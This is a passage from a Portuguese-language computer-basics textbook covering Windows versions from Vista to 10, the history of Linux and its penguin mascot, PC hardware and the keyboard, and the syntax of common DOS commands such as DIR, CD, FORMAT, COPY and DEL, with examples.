pelo atalho Logotipo do Windows + Tab) e visualização de miniaturas
ao passar o mouse sobre um item na barra de tarefas e na alternân-
cia através do comando Alt+Tab.

O Aero Glass não é disponibilizado nas Versões Starter e Basic.

Além das inovações gráficas, o Windows Vista inovou ao incluir


o Windows Media Center como um "centro" de entretenimento digital
nas versões a partir do Vista Home Premium. Também trouxe diver-
sas ferramentas integradas para segurança, como o Windows Defen-
der e o Windows Firewall (presente a partir do Windows XP Service
Pack 2). Além disso, é nativamente preparado para a alta definição.

A versão básica e popular do Windows Vista (Limitada):


Vista Starter Edition, destinado aos mercados emergentes e países
em desenvolvimento.

São duas versões destinadas ao usuário doméstico:


Vista Home Basic
Vista Home Premium

As duas versões voltadas para o público corporativo são:

Vista Business (projetado para atender às necessidades de empresas


de todos os portes)

Vista Enterprise (necessidades de grandes empresas globais)

A versão Ultimate é a edição mais abrangente do Windows Vista.


Reúne todos os recursos de infra estrutura avançados de um sistema
operacional empresarial, todos os recursos de gerenciamento e efici-
ência de um sistema operacional móvel, e todos os recursos de entre-
tenimento digital de um sistema operacional voltado ao consumidor.
Vista Ultimate.

274
As inovações e melhorias na interface e utilização do Sistema Opera-
cional (SO) exigiram maior capacidade do hardware, o que provocou
a manutenção do Windows XP em boa parte dos computadores.

O Windows Vista Ultimate Edition é a versão do Windows Vista que


mais requer recursos do computador. Para que o desempenho seja
razoável, a Microsoft recomenda um processador de 1.8Ghz (prefe-
rencialmente Dual-Core) e 1GB de memória RAM, sendo necessária
uma placa de vídeo compatível com o DirectX 9.0, pixel shader 2.0 e
128mb de memoria de vídeo para usufruir da transparência das jane-
las de Flip 3D (Windows Aero).

Ademais, devido as modificações no núcleo e no código feitas no


Windows Vista, houve durante o período inicial grande incompatibili-
dade de driver de dispositivo para os periféricos do computador, que
foi em boa parte solucionada ao longo do tempo com o lançamento
de drivers compatíveis pelas fabricantes.

Com os erros e acertos do Windows Vista, a Microsoft passou então


a desenvolver seu sucessor, o Windows 7, com todas as suas funcio-
nalidades, acrescidas de melhorias, porém atenta a paridade entre o
nível de recursos de hardware exigido e o presente no mercado de
forma geral, bem como o uso de retrocompatibilidade de drivers do
Windows Vista.

Windows Server 2008


Lançada em 27 de Fevereiro de 2008, sucedeu ao Windows Server
2003.

Windows Server 2008 Standard Edition


Em substituição ao Windows Server 2003, foi projetada para fornecer
serviços e recursos para outros sistemas em uma rede.

O sistema operacional tem um abundante conjunto de recursos e


opções de configuração. O Windows Server 2008 Standard Edition dá
suporte a 2-way e 4-way SMP (multiprocessamento simétrico) e a até
4 gigabytes de memória em sistemas de 32 bitse 32 GB em sistemas
de 64 bits.

275
Windows Server 2008 Enterprise Edition
Tal versão estende os recursos fornecidos no Windows Server 2008
Standard Edition para proporcionar maior estabilidade e disponibilida-
de e dar suporte a serviços adicionais como o Cluster e Serviço de
Federação do Active Directory. Também dá suporte a sistemas de
64 bits, memória RAM hot-swap e non-uniform memory access (NU-
MA). Os servidores enterprise podem ter até 32 GB de RAM em sis-
temas x86 e dois terabytes (TB) de RAM em sistemas de 64 bits e 8
CPUs.

Windows Server 2008 Datacenter Edition


Versão mais robusta do Windows Server 2008 com aperfeiçoamentos
nos recursos de cluster e suporte a configurações de memória muito
amplas com até 64 GB de RAM em sistemas x86 e dois TB RAM em
sistemas de 64 bits. Tem requisito mínimo de CPU e pode dar supor-
te a até 64 CPUs.

Windows Web Server 2008

Versão Web Edition do Windows Server 2008. Uma vez que foi proje-
tada para fornecer serviços Web para a implantação de sites e aplica-
tivos baseados nesta, essa versão do servidor só dá suporte a recur-
sos relacionados.

Especialmente, ela inclui o Microsoft.NET Frameworks, o Microsoft


Internet Information Services (IIS), o ASP.NET, além do servidor de
aplicativos e recursos de balanceamento de carga de rede. No entan-
to, não possui vários outros recursos, incluindo o Active Directory, e
exige a instalação do server core para obter alguma funcionalidade
padrão. O Windows Web Server 2008 dá suporte a até 2 GB de RAM
e 2 CPUs.

Windows Essential Business Server 2008


Para médias empresas.

Windows 7
Anteriormente com o codinome Vienna, este é o sucessor do Win-
dows Vista que inclui uma série de novos recursos e melhorias. Teve

276
sua versão Beta lançada em Janeiro de 2009 para todos aqueles que
se interessassem por testá-lo (conhecidos como Beta Testers), sendo
distribuído gratuitamente pela Microsoft em seu site (versão em in-
glês). Na versão Beta já se pode perceber pequenas mudanças, co-
mo maior integração a processador de Múltiplos Núcleos e inicializa-
ção mais rápida. Apresentou ainda uma versão Release Candidate
em Maio de 2009 com diversas melhorias em relação à versão Beta e
já bastante próxima a versão final. Foi lançado em 22 de Outu-
bro de 2009.

Inclui inovações na interface, utilizando ícones maiores na barra de


tarefas (taskbar), semelhante ao Mac OS (dockstation), com maior
nível de transparente em relação ao Windows Vista. Na nova barra de
tarefas o usuário pode fixar programas (como fazia nas versões ante-
riores através da barra Inicialização Rápida), porém diferentemente,
ao abrir um programa fixado o mesmo atalho se transforma na janela
aberta, não exibindo um segundo ícone na barra de tarefas. Além
disso, ao clicar sobre um ícone na barra de tarefas e arrastar o mou-
se para cima com o botão pressionado é exibida a Jump List, com
uma série de atalhos próprios do programa e lista de arquivos exibi-
dos recentemente por ele. Há também a função Aero Shake utilizada
para minimizar ou maximizar todas as janelas, clicando na parte su-
perior de uma janela (área transparente) e chacoalhando-a para os
lados rapidamente.

Também é possível redimensionar uma janela até as bordas superi-


or/inferior clicando e arrastando o mouse sobre a borda da janela. Há
também o Aero Peek, retângulo transparente localizado na extremi-
dade direita da barra de tarefas que permite visualizar a área de tra-
balho ao passar o mouse sobre ele ou ir para a área de trabalho caso
clicado. Também nota-se melhoria no reconhecimento de voz em
relação ao Windows Vista. Na versão Ultimate é possível receber
como Atualização Opcional outro idioma para o Windows como um
todo. O Windows 10 é a versão mais recente e é vendido na maioria
das lojas de informática e grandes magazines. O usuário pode confe-
rir se seu computador tem capacidade para rodar o Windows 10
no site da Microsoft.

277
Windows 8
Windows 8 é um sistema operacional da Microsoft para computado-
res pessoais, portáteis, netbooks e tablets. É o sucessor do Windows
7.

Foi anunciado oficialmente por Steve Ballmer, diretor executivo da


Microsoft, durante a conferência de pré-lançamento do sistema ope-
racional. Segundo a empresa, este sistema operacional é um sistema
para qualquer dispositivo, com uma interface totalmente nova, adap-
tada para dispositivos sensíveis ao toque.

Windows 8.1
Windows 8.1 é semelhante ao Windows 8, porém é um erro pensar
que esta versão é uma atualização do Windows 8, a própria Microsoft
o classifica como uma nova versão e não como uma atualização.

Projetados com base no Windows 8.1 traz aprimoramentos em recur-


sos de personalização e de pesquisa, em aplicativos, na Windows
Store e na conectividade em nuvem.

Além disso, apresentam os recursos de segurança e confiabilidade


que você espera do Windows. Eles são rápidos e foram desenvolvi-
dos para funcionar em diferentes dispositivos, especialmente naque-
les da nova geração de dispositivos de toque.

Windows 10
Como previsto, o botão Iniciar está de volta reimaginado, mesclando
o tradicional do Windows 7 com os blocos dinâmicos do Windows 8,
que também são redimensionáveis conforme o gosto do usuário.

O novo menu Iniciar tem uma nova ferramenta de buscas integradas,


que também apresenta resultados da web. Ou seja: o novo Windows
é mais Bing do que nunca.

A Microsoft parece ter feito isso para solucionar as críticas ao Win-


dows 8, que pareceu ter sido desenvolvido com telas de toque em
mente, deixando um pouco de lado os usuários de teclado e mouse.

278
Por isso, os aplicativos da Windows Store agora podem ser executa-
dos como janelas, o que não era possível antes.

Outra das novidades apresentada é um novo sistema de multitarefa,


que permite ao usuário gerenciar múltiplos desktops. Assim, cada um
dos desktops tem seus próprios aplicativos sendo executados, e a
transição entre eles é simples.

A empresa também apresentou novidades nesta área, mas manteve a


Charm Bar lateral, que era um problema para o mouse, mas muito útil
para o toque.

O multitarefa, com múltiplos desktops, está presente para os usuários


de toque, mas repaginado para ser mais agradável ao toque, com
botões maiores e mais amigáveis.

A tela de Início também esta disponível como ela existia no Windows


8 para quem prefere utilizar o sistema no modo de toque. Já para
quem tem um laptop conversível, é possível alternar entre as versões
“Metro” e o novo desktop.

O lançamento comercial do software Windows 10, aconteceu em julho


de 2015, contudo há rumores que esta versão do Windows será a
última, a Microsoft cogita em partir para outras plataformas.

Linux

Logo que Linus Torvalds passou a disponibilizar o Linux, ou seja na


sua versão 0.01, já havia suporte ao disco rígido, tela, teclado e por-
tas seriais, o sistema de arquivos adotava o mesmo layout do Minix
(embora não houvesse código do Minix no Linux), havia extensos
trechos em assembly, e ela já era capaz de rodar o bash e o gcc.
“A linha guia quando implementei o Linux foi: fazê-lo funcionar
rápido. Eu queria o núcleo simples, mas poderoso o suficiente
para rodar a maioria dos aplicativos Unix.”

279
O próprio usuário deveria procurar os programas que dessem funcio-
nalidade ao seu sistema, compilá-los e configurá-los. Talvez por isso,
o Linux tenha carregado consigo a etiqueta de sistema operativo
apenas para técnicos.

Foi neste ambiente que surgiu a MCC Interim Linux, do Manchester


Computer Centre, a primeira distribuição Linux, desenvolvida
por Owen Le Blanc da Universidade de Manchester.

Capaz de ser instalada independentemente em um computador. Foi


uma primeira tentativa de facilitar a instalação do Linux.

Desde o começo, o núcleo Linux incluía um sistema básico pa-


ra chamadas do sistema e acesso aos dispositivos do computador.

O núcleo de um sistema operativo define entre várias operações, o


gerenciamento da memória, de processos, dos dispositivos físicos no
computador e é uma parte essencial de qualquer sistema operacional
utilizável, contudo para um sistema operacional adquirir funcionalida-
de são necessários também vários outros aplicativos que determinam
funções específicas que aquele sistema será capaz de desenvol-
ver, os aplicativos existentes em um sistema operacional com a
única exceção do núcleo são determinados pelo usuário do
computador, como por exemplo: interpretadores de comandos, ge-
renciadores de janelas, que oferecem respectivamente uma interface
para o usuário do computador, CLI ou GUI, e ou-
tros aplicativos como editores de texto, editores de imagem, tocado-
res de som, e, mas não necessariamente, compiladores.

A maioria dos sistemas inclui ferramentas e utilitários baseados no


BSD e tipicamente usam XFree88 ou X.Org para oferecer a funciona-
lidade do sistemas de janelas X - interface gráfica.

Assim como também oferecem ferramentas desenvolvidas pelo proje-


to GNU.

No momento do desenvolvimento do Linux, vários aplicativos já vi-


nham sendo reunidos pelo Projeto GNU da Free Software Founda-
tion (‘Fundação Software Livre’), que embarcara em um subprojeto

280
que ainda continua para obter um núcleo, o GNU Hurd. Porém devido
a várias complicações o projeto GNU e demora em desenvolver o
Hurd, Stallman acabou adotando o núcleo Linux como base para
distribuir os programas do projeto GNU , não obstante diversas pes-
soas e instituições tiveram a mesma ideia e assim várias distribuições
começaram a surgir baseadas no núcleo desenvolvido inicialmente
por Linus.

Linux foi o nome dado ao núcleo de sistema operacional criado por


Linus Torvalds. Por extensão, sistemas operacionais que usam o
núcleo Linux são chamados genericamente de Linux.

Entretanto, a Free Software Foundation afirma tais sistemas operaci-


onais são, na verdade, sistemas GNU, e o nome mais adequado para
tais sistemas é GNU/Linux, uma vez que grande parte do código-
fonte dos sistemas operacionais baseados em Linux são ferramentas
do projeto GNU. Há muita controvérsia quanto ao nome Eric
Raymond.

Afirma, no Jargon File, que a proposta da FSF só conseguiu a "acei-


tação de uma minoria" e é resultado de uma "disputa territorial".

Linus Torvalds afirma que consideraria "justo" que tal nome fosse
atribuído a uma distribuição do projeto GNU, mas que chamar os
sistemas operacionais Linux como um todo de GNU/Linux seria "ridí-
culo". Linus disse não se importar sobre qual o nome usado, conside-
ra a proposta da GNU como "válida" mas prefere usar o termo "Li-
nux".

Sobre o símbolo

281
O símbolo do software foi escolhido pelo seu criador (Linus Tor-
valds),que um dia estava no zoológico e foi surpreendido pela mordi-
da de um pinguim. Fato curioso e discutido até hoje.

Em 1996, muitos integrantes da lista de discussão "Linux-Kernel"


estavam discutindo sobre a criação de um logotipo ou de um mascote
que representasse o Linux. Muitas das sugestões eram paródias ao
logotipo de um sistema operacional concorrente e muito conhecido
(Windows). Outros eram monstros ou animais agressivos. Linus Tor-
valds acabou entrando nesse debate ao afirmar em uma mensagem
que gostava muito de pinguins. Isso foi o suficiente para dar fim à
discussão.

Depois disso, várias tentativas foram feitas numa espécie de concur-


so para que a imagem de um pinguim servisse aos propósitos do
Linux, até que alguém sugeriu a figura de um "pinguim sustentando o
mundo". Em resposta, Linus Torvalds declarou que achava interes-
sante que esse pinguim tivesse uma imagem simples: um pinguim
"gordinho" e com expressão de satisfeito, como se tivesse acabado
de comer uma porção de peixes. Torvalds também não achava atra-
ente a ideia de algo agressivo, mas sim a ideia de um pinguim simpá-
tico, do tipo em que as crianças perguntam "mamãe, posso ter um
desses também?".

Ainda, Torvalds também frisou que trabalhando dessa forma, as pes-


soas poderiam criar várias modificações desse pinguim. Isso real-
mente acontece.

Quando questionado sobre o porquê de pinguins, Linus Torvalds res-


pondeu que não havia uma razão em especial, mas os achava engra-
çados e até citou que foi bicado por um "pinguim assassino" na Aus-
trália e ficou impressionado como a bicada de um animal aparente-
mente tão inofensivo podia ser tão dolorosa.

Composição básica do PC

- Unidade Central de Processamento;


- Memória;

282
- Teclado;
- Vídeo;
- Unidades de Disco;
- Impressora.

Fluxo de informações

Impressora
Teclado UCP
Discos
Discos Memória Vídeo

Entrada Processamento Saída

Teclado

Cuidado para não confundir:


l com 1
O com 0
S com 5
Z com 2

Teclas

Separadas em três grupos:


- as de uso normal em digitação (letras, números e símbolos);
- as de uso com função (F1, F2... F12, INS, DEL, PrtScr, SHIFT,
etc.);
- as de uso com associação de outras (CTRL + C, CTRL + P, CTRL +
S);

Enter, Ret, Return, <----,

Quando se digita um comando (instrução para o Sistema Operacio-


nal), no final do comando têm-se que digitar <ENTER> para que este

283
comando seja lido, interpretado e executado pelo Sistema Operacio-
nal.

Edição de comandos

DEL, ESC, F1, ou -->


F2, F3, F4, F5, INS

Toda linha digitada (seguida de <ENTER>) vai para um buffer de


memória do teclado, além de ser tratada pelo Sistema Operacional;

Você pode digitar dados novos, ou trabalhar em cima do conteúdo do


buffer (consegue, assim, aproveitar parte do que já fez, seja para
alterar, seja para corrigir).

<ENTER> - Envia a linha de edição para o Sistema Operacional e


para o buffer de memória do teclado;

F1 ou --> - No DOS traz um caracter do buffer para alinha de edição.


No Windows é usado para exibir ajuda (Help);

Reset

CTRL+ ALT + DEL


Para dar nova carga no Sistema Operacional quando o computador
"prende". Isso ocorre, por Exemplo, quando um programa especifica
impressora e a mesma está com defeito.

Tab ou -->
<--

Tabulação positiva (avança oito espaços para a direita).

Ctrl + Esc ou Shift + PrtSc ou Print Screen

Imprime o conteúdo do vídeo, também chamado de Hardcopy.

284
Ctrl + S ou Pause (DOS)

Para o rolamento da tela. Se repetir, o rolamento continuará. Este


procedimento é normalmente usado com o DIR ou o TYPE.

Ctrl + P

Envia para a impressora todos os caracteres que aparecem no vídeo.


Se for digitado novamente o CTRL + P, é desativado este processo.
No Windows este procedimento ativa a janela para impressão de
documento.

Observação: Existem teclas especiais que tem diferentes utilizações,


dependendo de como o aplicativo as está interpretando. Mas estas
teclas não tem nenhum significado para o Sistema Operacional. Al-
guma destas teclas seriam HOME, PGDN, PGUP, ALT, F7, F8, F9,
F10, F11, F12 e em alguns teclados: PA1, PA2, SYS e CSEL.

Caps Lock

Fixa o modo de letras maiúsculas. Um segundo toque, desativa.

Shift

Ativa as letras maiúsculas enquanto estiver pressionado.

Num Lock

Ativa ou desativa o bloco numérico.

Video

O vídeo se compõe de uma matriz de linhas e colunas, normalmente,


tudo o que se digita no teclado é ecoado por ele. O nome correto do
vídeo e reconhecido pelo computador é CON de CONsole.

A posição em que aparecerá o caracter que venhamos a digitar é a


do cursor (traço piscante).

285
Unidades de disco

Podem ser de dois tipos:

removíveis - disquetes de 5 1/4' e 3 1/2', nome das unidades: A: e B:,


e CDs ou DVDs, pendrivers, HD externos, etc.
fixos - discos "HD (Hard Disk)".

Capacidade

De um HD (Hard Disk): 10, 20, 30, 40 ... Mb. Até mais de 3 Tbytes.

Um disquete ou HD (Hard Disk) novo precisa ser formatado, ou seja,


cria-se trilhas e setores em sua superfície, para que o Sistema Ope-
racional tenha como endereçar os arquivos neles gravados.

Os CDs tem uma capacidade de 700 MB e os DVDs 4,7 GB podendo


alguns ter sua capacidade de armazenamento em até 32 GB. Somen-
te os CD-R/W e os DVD-R/W podem ser formatados e reaproveita-
dos, os CD-R e DVD-R são somente para uma única gravação.

Arquivos em disco

O disco armazena informações na forma de arquivos. Numa primeira


aproximação um arquivo é definido por:

- um disco;
- um nome;
- um tamanho.

Um arquivo qualquer fica acessível ao Sistema quando o disco que o


contém está numa das unidades de disco (A:, B:, C:, ...). Além do
nome e do tamanho, um arquivo possui ainda: extensão, data e hora
de criação.

Especificação de arquivos

Uma especificação completa de um arquivo, sob o Sistema Operaci-


onal, tem a forma:

286
[UD:] [ROTA] [ARQ.EXT]

Sendo:

UD = unidade de disco que contém o arquivo;

ROTA = tem a ver com o endereço de armazenamento do arquivo,


discutidos mais adiante;

ARQ.EXT = nome e tipo do arquivo.

Nome de arquivos e referências genéricas

ARQ = no DOS, o nome do arquivo é uma sequência de 1 a 8 carac-


teres pertencentes à tabela abaixo, no Windows esta limitação não se
aplica.

Letras A até Z
Algarismos 0 até 9
Símbolos !#$%&()_-

EXT = a extensão do arquivo é uma sequência de 0 a 3 caracteres da


tabela acima. Na omissão da extensão, deve-se também omitir o "."
(ponto), que é apenas um delimitador. No Windows esta limitação
passou a ter 4 caracteres.

Exemplo:

Nome do arquivo
CARTA.DOC Extensão do arquivo
123.EXE
Ponto delimitador

Muitas vezes precisamos especificar uma classe de arquivos, e não


apenas um. Para isso existem as referências genéricas, também co-
nhecidas como coringas.

287
Há dois caracteres definidores:

"?" - referência genérica a um caracter do nome do arquivo ou exten-


são;

"*" - referência genérica a todo ou ao resto do nome do arquivo ou


extensão.

O funcionamento é simples: nas posições de referência genérica a


comparação aceita qualquer caracter válido.

Exemplo 1, Formato normal (DOS):

C>DIR <ENTER>
CARTA1A.TXT
CARTA1A.DOC
CARTA2A.DOC
CARTA1A.BAS

Exemplo 2, referência a um caracter:

C>DIR CARTA?A.DOC <ENTER>


CARTA1A.DOC
CARTA2A.DOC

Exemplo 3, referência a toda a extensão:

C>DIR CARTA1A.* <ENTER>


CARTA1A.TXT
CARTA1A.DOC
CARTA1A.BAS

Diretórios e sub diretórios (pastas)

O sistema operacional permite que se crie áreas separadas dentro do


mesmo disco, e, nessas áreas, podem ser colocados os arquivos que
você desejar.

288
O diretório principal, também chamado raiz, é o diretório de partida,
ou seja, aonde estamos após darmos a partida do sistema. A partir
daí, podemos criar sub-diretórios, nos encaminhar-mos a sub-
diretórios ou eliminar estes sub-diretórios , (veja comandos MD, CD e
RD).

Exemplo de uma possível organização:

DIRETÓRIO
RAIZ

FOLHA TEXTOS CARTAS

para citar os arquivos no DOS do sub diretório FOLHA a "rota" é


\FOLHA. Sendo que, "\" é o nome do diretório raiz.

Obs.: Rota é o que você escreve na linha de comando para interpre-


tação do computador. Assim, se você quiser acessar o diretório TEX-
TOS, a rota será: CD\TEXTOS.

Dispositivos padrão

Na digitação de comandos há um conjunto de palavras-chave que


permitem especificar os dispositivos. Neste conjunto estão:

CON - (de CONsole) que especifica:


teclado - quando em entrada;
vídeo - quando em saída.

LPT1 ou PRN - (de Line Printer 1 ou PRiNter) - saída na primeira


impressora paralela;

289
LPT2 e LPT3 - saída na segunda e terceira impressoras paralelas,
respectivamente;

COM1... COM4 - saídas (portas de comunicação) seriais;

A, B, C, D,... - unidades de disco (depende da configuração).

Comandos do Sistema Operacional (DOS)

TIPOS

internos - vêm para a memória quando se carrega o Sistema Opera-


cional, através do arquivo externo COMMAND.COM, e aí permane-
cem;

externos - ficam no disco, normalmente num diretório chamado DOS,


prontos para serem chamados, quando for necessário.

Quanto à execução

direta - você especifica a ação e esta se dá no mesmo momento, de


forma completa. Exemplo:

DIR (interno)

interativos - nesse caso você especifica um programa e este fica


rodando até que você queira parar. Exemplo:

DOSSHELL (externo)

Os comandos e seus parâmetros podem ser digitados tanto em letras


maiúsculas como minúsculas.

Descrição dos comandos do DOS

 CLS (interno)
Limpa a tela e posiciona o cursor no início da mesma.

Formato:

290
cls

Detalhamento:
Após a execução desse comando, se o monitor de vídeo for em co-
res, a tela passa a exibir caracteres brancos sobre fundo preto, a não
ser que exista instrução diferente de Prompt. Ver comando PROMPT
e arquivos em lote.

 DATE (interno)
Permite consultar ou atualizar a data do relógio interno

Formato:
date

Detalhamento:
DD - dia do mês, indo de 1 a 31;
MM - mês, indo de 1 a 12;
AA - ano, indo de 80 a 99 (correspondente a 1980 e 2099).

O comando DATE exibe a data, permite corrigi-la, se necessário, e


volta ao sistema operacional. Observe também que o separador de
dados pode ser o "-" (hífen) ou a "/".

Exemplo:
C:\>date <ENTER>
A data atual é: Sex 16-04-1992
Digite a nova data: 17-14-92
Data inválida
Digite a nova data: 17-04-92
C:\>

 TIME (interno)
Permite consultar ou alterar a hora do relógio interno

Formato:
time

Detalhamento:
HH - Hora (0 a 23);

291
MM - Minutos (0 a 59);
SS - Segundos (0 a 59);
CS - Centésimos de segundo (0 a 99).

O comando, sem parâmetros, exibe a hora e permite corrigi-la. Com


parâmetros, corrige a hora e volta ao Sistema Operacional.

Exemplo:
C:\>time
A hora atual é: 00:00:05.01
Digite a nova hora: 21:15:30
C:\>

Obs.: O único detalhe é que os centésimos de segundo separam-se


com "." e não com ":" dos segundos.

 DIR (interno)
Exibe os arquivos de um diretório e/ou sub-diretórios.

Formato:
dir [ud:] [rota] [arq.ext] [/P] [/W] [/S] [/A-][/O-] [/B] [/L] [Ch]

Sendo:
ud: - Unidade de disco, (A, B ou C);
rota - Sub-diretório desejado, se for o caso;
arq.ext - Nome do arquivo com sua extensão, se for o caso. (podem
ser usadas referências genéricas);
/P - Esta opção provoca uma parada na listagem da tela, a cada 25
linhas, e pede uma tecla para continuar;
/W - Produz um mapa simplificado somente com o nome e tipo de
arquivo, colocando 5 arquivos numa mesma linha, não exibindo o
tamanho, a data e a hora de criação;
/S - Produz uma pesquisa de arquivos em todos os subdiretórios sub-
sequentes;
/A - Exibe os arquivos com os atributos especificados.
D = Diretórios
R = Arquivos somente de leitura
H = Arquivos ocultos
A = Arquivos a serem arquivados

292
S = Arquivos de sistema
- = Prefixo que significa "não" (-D, -R, -H, -A, -S)
/O - Lista os arquivos por ordem de classificação.
N = Por nome
S = Por tamanho (ascendente)
E = Por extensão
D = Por data e hora
G = Grupo de diretórios
C = Pela taxa de compactação
- = Prefixo p/inversão de ordem (-N, -S, -E, -D, -G, -C)
/B - Usa um Formato simples, sem informes adicionais.
/L - Utiliza letras minúsculas na listagem.
/C[h] - Mostra a taxa de compactação do dblspace, em agrupamentos
de 8k. A opção "h" exibe a taxa de compactação. Quando usada a
opção /W ou /B, a opção /C[h] é ignorada.

Exemplo:
C:\>dir *.exe
C:\>dir f*.* /p
C:\>dir /s
C:\>dir \dos\*.exe /p/w

 CD ou CHDIR (interno)
Altera ou exibe o diretório corrente.

Formato:
cd\[rota]

Sendo:
rota - é a seqüência de diretórios que leva do diretório raiz ou do dire-
tório corrente atual ao novo diretório corrente.

Detalhamento:
O encadeamento de diretórios formando uma rota é feito pela barra
inversa "\". Uma barra no início da rota indica diretório principal. A
omissão da barra inicial implica início no diretório corrente, avança
um diretório e CD.. retrocede um diretório. Ao se digitar somente CD
e <ENTER>, é exibido o nome do diretório corrente.

293
Exemplo:
C:\>cd\folha <enter>
C:\FOLHA>_

C:\>cd\folha\fabrica <enter>
C:\FOLHA\FABRICA>_

 MD ou MKDIR (interno)
Cria um diretório ou um sub-diretório.

Formato:
md [ud:]\rota

Sendo:
ud: - unidade de disco em que se quer criar um novo diretório;
rota - sequência de diretórios ou sub-diretórios que parte do raiz, ou
não, separados por "\". O comprimento máximo de um caminho de
diretórios é de 63 caracteres, totais.

Exemplo:
C:\>md\folha (criando o diretório folha ligado ao raiz);
C:\>md\folha\fabrica (criando o sub-diretório fabrica ligado ao folha).

 RD ou RMDIR (interno)
Apaga um diretório ou um sub-diretório, vazio.

Formato:
rd [ud:]\rota

Sendo:
ud: - unidade de disco;
rota - sequência de nomes de diretórios, separados por "\".

Detalhamento:
Para se apagar um diretório ou sub-diretório, o mesmo deve estar
vazio. Não deve ter, portanto, nenhum arquivo na listagem desse
diretório ou sub-diretório, e nem tão pouco tentar remover estando
dentro dele.

294
Exemplo:
C:\>rd\folha\fabrica (remoção do sub-diretório fabrica)

 REN ou RENAME (interno)


Altera o nome de um arquivo específico ou de vários, chamados atra-
vés de referências genéricas.

Formato:
ren [ud:] [rota] arqant.ex1 arqnov.ex2

Sendo:
ud: - unidade onde está o arquivo a ser trocado o nome;
rota - diretório ou sub-diretório onde está o arquivo, se for o caso;
arqant.ex1 - nome do arquivo e extensão a ser mudado;
arqnov.ex2 - novo nome do arquivo e extensão.

Exemplo:
C:\>ren carta.txt memo.txt
C:\>ren *.txt *.doc
Detalhamento:

- No primeiro Exemplo, o arquivo carta com a extensão txt mudou de


nome para memo com a extensão txt.
- No segundo Exemplo, todos os arquivos com a extensão txt muda-
ram para a extensão doc.
- Muito cuidado ao renomear um arquivo, a extensão, na maioria dos
casos não deve ser modificada, sob pena do mesmo não ser mais
reconhecido pelo computador.

 FORMAT (externo)
Inicializa (prepara para ser usado) o disco da unidade especificada.

Formato:
format ud: /S /V /1 /4 /8 /B /T: /N:nnn /F:nnn /Q /U

Sendo:
ud: - unidade onde está o disco a formatar. É obrigatória;
/S - transfere o Sistema Operacional para o disco após formatado;

295
/V - o FORMAT, ao término do processo, solicita um nome para o
disco. Este nome pode conter de 1 a 11 caracteres válidos (sem o "."
separando parte principal e secundária). O nome do volume aparece-
rá em todas as listagens do diretório. Identifica, de forma inequívoca,
um disco. Este procedimento se dá automaticamente a partir da ver-
são 4.01 do MS-DOS;
/1 - formata um único lado de um disco flexível;
/4 - formata discos de 5 1/4 de polegada, de 360 kb e de dupla face
em unidades (driver) de alta capacidade. Algumas unidades de 360
kb poderão não ler corretamente os discos que forem formatados
com esta opção;
/8 - formata 8 setores por trilha;
/B - formata disco deixando nele espaço suficiente para um sistema
operacional;
/T: - formata discos de 3 1/2 de polegada de 720 kb ou 1.44 mb espe-
cificando a quantidade de trilhas no disco, para estes casos o valor
será de 80 (/t:80);
/N:nnn - formata discos de 3 1/2 de polegadas de 720 kb especifican-
do a quantidade de setores por trilha, que deverá ser 9 (/n:9);
/F:nnn - especifica o tamanho do disquete de 5 1/4 ou 3 1/2 de pole-
gadas a ser formatado em unidade (driver) de alta capacidade, (/f:360
ou /f:720);
/Q - realiza uma formatação rápida;
/U - realiza uma formatação incondicional, não recuperável pelo ar-
quivo UNFORMAT.

Detalhamento:
Muito cuidado com o disco que você vai formatar. Cuidado também
com a especificação da unidade. O FORMAT começa "eliminando"
tudo o que tem no disco. Tudo que houver nele é perdido.

O processo de formatação inicializa o disco todo. Verifica se todas as


trilhas e setores estão bons para leitura e escrita. Marca os ruins para
que não sejam usados. Inicializa também o diretório-raiz.

Exemplo:
C:\>format a:/S /4 (Formata disquetes de 360 Kb em unidades de 1.2
Mb, e transfere o Sistema Operacional).

296
As opções /N e /T não podem ser utilizadas com a opção /F.

 VER (interno)
Exibe a versão do sistema operacional.

Formato:
ver

Exemplo:
C:\>ver
MS-DOS Versão 6.00
C:\>_

 VOL (interno)
Exibe o nome do volume e o número de série do disco.

Formato:
vol ud:

Sendo:
ud: a unidade de disco do qual se quer o nome do volume.

Detalhamento:
A associação de um nome de volume a um disco é uma das opções
do comando FORMAT com o /V. A grande vantagem desse nome é
ser uma identificação única para o disco. Esse nome aparece na lis-
tagem do diretório.

Exemplo:
C:\>vol a:
O volume da unidade A não possui nome
O número de série da unidade é 1B5A-61D7
C:\>_

 COPY (interno)
Transfere informações (copia um ou mais arquivos) entre dois dispo-
sitivos. Aplica-se basicamente a arquivos visíveis, os arquivos ocultos
não são copiados por este comando.

297
Formato:
copy [ud:] arq.ext [un:] [/A] [/B] [/V]

Sendo:
ud: - dispositivo (driver) de origem;
arq.ext - arquivo e extensão a ser copiado;
un: - dispositivo (driver) de destino;
/A - indica um arquivo de texto ASCII;
/B - indica um arquivo binário;
/V - grava e verifica a gravação dos arquivos no destino.
/Y - substitui arquivos existentes sem solicitar confirmação.
/-Y - solicita confirmação para substituição de arquivos.

Exemplo:
C:\>copy c:carta.txt a:/v

Detalhamento:
copy con prn - transfere o que se digitar, para a impressora. O mes-
mo que CTRL + P.

copy carta.txt + oficio.txt b: - concatena ou seja, junta os dois arquivos


gravando-os da unidade corrente para a unidade b:. (somente para
arquivos de texto).

copy con carta - neste caso digita-se pelo teclado o conteúdo do ar-
quivo CARTA. A digitação se encerra pela tecla F6 ou CTRL + Z,
quando então o arquivo é gravado na unidade corrente. (ver arquivos
de lote).

 VERIFY (interno)
Ativa (ou desativa) o modo de verificação na escrita em disco.

Formato:
verify on ou off

Sendo:
on - ativa a verificação. Neste caso o sistema operacional faz uma
verificação no momento da gravação;
off - desativa o processo de verificação.

298
Detalhamento:
- A verificação ativa torna pouquíssimo mais lenta a escrita em disco.
Por isso pode ser usada sempre, bastando ser incluído no Autoe-
xec.bat.

- Na omissão de ON e OFF o verify exibe o estado da chave.

Exemplo:
C:\>verify on (o verify tornou-se ativo)
C:\>_

C:\>verify (o verify sem parâmetros só verifica a chave)


VERIFY ESTA ON
C:\>_

No primeiro comando ativou-se o modo verificação. O segundo con-


firmou o funcionamento do primeiro.

 DEL ou ERASE (interno)


Elimina arquivo(s) que não tenha(m) a proteção (Ready Only, ou seja,
+R), e que não estejam ocultos (Hiden, ou seja, +H). Não elimina
diretórios ou sub-diretórios, para esta finalidade usa-se o DELTREE.

Formato:
del [ud:] [rota] arq.ext [/P]

Sendo:
ud: - unidade onde se encontra o arquivo;
rota - diretório onde se encontra o arquivo, se for o caso;
arq.ext - nome do arquivo a ser eliminado (podem ser usadas refe-
rências genéricas);
/P - solicita pela confirmação antes da exclusão.

Exemplo:
